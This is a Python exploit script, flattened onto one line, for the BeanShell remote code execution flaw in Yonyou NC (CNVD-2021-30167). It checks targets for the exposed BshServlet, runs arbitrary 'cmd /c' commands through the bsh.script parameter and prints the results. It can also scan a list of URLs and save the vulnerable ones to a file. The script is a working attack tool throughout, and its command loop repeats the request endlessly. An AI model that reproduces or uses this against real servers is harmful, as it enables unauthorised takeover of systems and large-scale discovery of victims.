用友NC BeanShell远程代码执行

# -*- coding: utf-8 -*- import argparse import time import requests import re import sys from urllib.parse import quote from pyfiglet import Figlet RED = '\x1b[1;91m' BLUE = '\033[1;94m' GREEN = '\033[1;32m' BOLD = '\033[1m' ENDC = '\033[0m' def check_host(host): if not host.startswith("http"): print(RED+'[x] ERROR: Host "{}" should start with http or https\n'.format(host)+ENDC) return False else: return True def NcCheck(target_url): print(GREEN+"TARGET:"+target_url) print(BLUE + '[*]正在检测漏洞是否存在\n' + ENDC) url = target_url + '/servlet/~ic/bsh.servlet.BshServlet' headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.360' } try: response = requests.get(url=url, headers=headers, timeout=5) if response.status_code == 200 and 'BeanShell' in response.text: print(GREEN + '[+]BeanShell页面存在, 可能存在漏洞: {}\n'.format(url) + ENDC) return True else: print(RED + '[-]漏洞不存在\n' + ENDC) except: print(RED + '[-]无法与目标建立连接\n' + ENDC) def NcRce(url,command): headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.360', 'Content-Type': 'application/x-www-form-urlencoded' } while True: data = 'bsh.script=' + quote('''exec("cmd /c {}")'''.format(command.replace('\\', '\\\\')), 'utf-8') try: response = requests.post(url=url, headers=headers, data=data) pattern = re.compile('<pre>(.*?)</pre>', re.S) result = re.search(pattern, response.text) print(result[0].replace('<pre>', '').replace('</pre>', '')) except: print(RED + '[-]未知错误\n' + ENDC) sys.exit(0) def main(): f = Figlet(width=2000) print(f.renderText("Cuerz")) parser = argparse.ArgumentParser(description='CNVD-2021-30167') print('Example: YONYOU-NC-RCE.py -u http://www.emample.com --check') parser.add_argument("-u", "--url", help='Start scanning url') parser.add_argument("-f", "--file", help='read the url from the file') parser.add_argument("--check", required=False, default=False, action='store_true', help='Check if vulnerable') parser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: "ls -l")') args = parser.parse_args() if args.url and check_host(args.url): if args.check: NcCheck(args.url) elif args.cmd: NcRce(args.url,args.cmd) elif args.file: f = open(args.file,"r") all = f.readlines() for i in all: url = i.strip() if check_host(url): if NcCheck(url): with open('Exist.txt', 'a+') as fp: fp.write(url + '\n') time.sleep(0.2) if __name__ == '__main__': main()